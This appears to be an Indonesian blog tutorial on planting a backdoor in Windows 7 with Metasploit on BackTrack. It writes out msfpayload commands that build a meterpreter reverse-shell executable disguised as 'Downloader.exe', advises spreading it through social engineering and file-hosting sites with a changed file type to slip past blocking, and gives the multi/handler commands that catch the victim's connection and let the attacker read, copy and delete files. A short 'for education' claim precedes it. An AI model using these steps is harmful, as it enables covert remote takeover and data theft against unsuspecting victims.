CARA MENANAMKAN BACKDOOR DI SISTEM OPERASI DENGAN BACKTRACK
Pada post kali ini, gw akan membahas cara menanamkan baackdoor pada sistem operasi komputer, harap diingat artikel ini bertujuan untuk pendidikan dan mengetest sistem keamanan pada komputer, sebelum kita mulai, kita harus tau, apa sih backdoor itu?menurut Wikipedia, backdoor adalah merujuk kepada mekanisme yang dapat digunakan untuk mengakses sistem, aplikasi, atau jaringan, selain dari mekanisme yang umum digunakan (melalui proses logon atau proses autentikasi lainnya). Disebut juga sebagai back door.Beberapa pengembang perangkat lunak menambahkan backdoor ke dalam program buatannya untuk tujuan merusak (atau tujuan yang mencurigakan). Sebagai contoh, sebuah backdoor dapat dimasukkan ke dalam kode di dalam sebuah situs belanja online (e-commerce) untuk mengizinkan pengembang tersebut memperoleh informasi mengenai transaksi yang terjadi antara pembeli dan penjual, termasuk di antaranya adalah kartu kredit dengan backdoor, kita dapat mengakses suatu sistem tanpa harus melalui proses seperti biasanya, menambah, menghapus, mengambil file dan lain lain .dalam tutorial berikut, akan menjelaskan cara menanam backdoor pada sistem operasi windows 7Semakin banyaknya aplikasi eksploitasi memperkuat paradigma akan tidak adanya sistem yang aman. Bahkan sistem keamanan Windows 7 yang sudah di patch dari beberapa kelemahan yang terdapat pada varian sebelumnya (Windows XP dan Vista) ternyata masih bisa dieksploitasi. Bahkan cara eksploitasi kelemahan tersebut hampir sama dengan eksploitasi pada varian windows sebelumnya, menggunakan meterpreter. Serangan ini memang jenis serangan standar, akan tetapi masih bisa digunakan serta dipahami oleh user awam untuk mengerti akan kerawanan sistem dan bahaya aksi vandal yang dilakukan attacker dengan mengancam informasi rahasia user. Pada tulisan ini, saya akan mencoba membuat sebuah backdoor menggunakan bantuan metasploit yang terdapat pada paket distribusi back|track. Tulisan ini tidak mendiskritkan mengenai kelemahan sebuah OS, setiap OS memiliki kelemahan masing-masing, begitu juga dengan Linux. Linux masih mungkin di eksploitasi sama dengan Windows, akan tetapi menggunakan metoda yang berbeda, Rootkit.
Langkah pertama yang perlu dilakukan untuk memasang backdoor pada target windows 7 adalah membuat file tersebut terlebih dahulu. Cara membuat file nya pun tergolong mudah. cukup mengetikkan perintah di bawah ini pada terminal backt|track anda.
msfpayload windows/meterpreter/reverse_tcp LHOST=[IP Attacker] LPORT=[Port] x > /folderpenyimpanan/namafile.ekstensi
contoh :
msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.28.2 LPORT=4444 x > /root/Desktop/Downloader.exe
File backdoor yang dibuat oleh metasploit tersebut akan tersimpan pada Desktop back|track. Hal ini sesuai dengan media penyimpanan yang dipilih sebelumnya. Setelah file tersebut terbentuk, untuk mendistribusikannya, bisa menggunakan beberapa cara, bisa dengan bypass langsung/serang langsung pada target atau menggunakan teknik soceng terhadap korban. Untuk mendistribusikan dengan teknik soceng, attacker cukup mengupload file backdoor di internet atau bisa mengirimkan file tersebut kepada korban.


Setelah melakukan perubahan terhadap tipe data file, website file hosting seperti 4shared sudah tidak melakukan block lagi terhadap file backdoor. Sampai pada tahapan ini tugas kita sebagai attacker sudah selesai dilakukan. Tinggal bagaimana cara mendsitribusikan file tersebut. Saya asumsikan disini, attacker berhasil mempengaruhi korban untuk mendownload file tersebut, dan merubah kembali tipe data file menjadi file executable.

msf exploit (handler) > use /exploit/multi/handler
msf exploit (handler) > set PAYLOAD windows/meterpreter/reverse_tcp
msf exploit (handler) > set LHOST [IP Attacker]
msf exploit (handler) > exploit
contoh
msf exploit (handler) > use /exploit/multi/handler
msf exploit (handler) > set PAYLOAD windows/meterpreter/reverse_tcp
msf exploit (handler) > set LHOST 192.168.28.2
msf exploit (handler) > exploit



Apabila sudah sesuai dengan properties dari komputer korban, berarti backdoor berhasil ditanam dan misi sudah berhasil dilakukan. Untuk memastikan apakah benar-benar bisa melakukan proses penulisan file, pengopyan file bahkan penghapusan file silahkan langsung melakukannya pada terminal yang ada. Contoh kali ini saya akan mencoba membuat sebuah folder yang bernama test_backdooring pada desktop korban

0 komentar:
Posting Komentar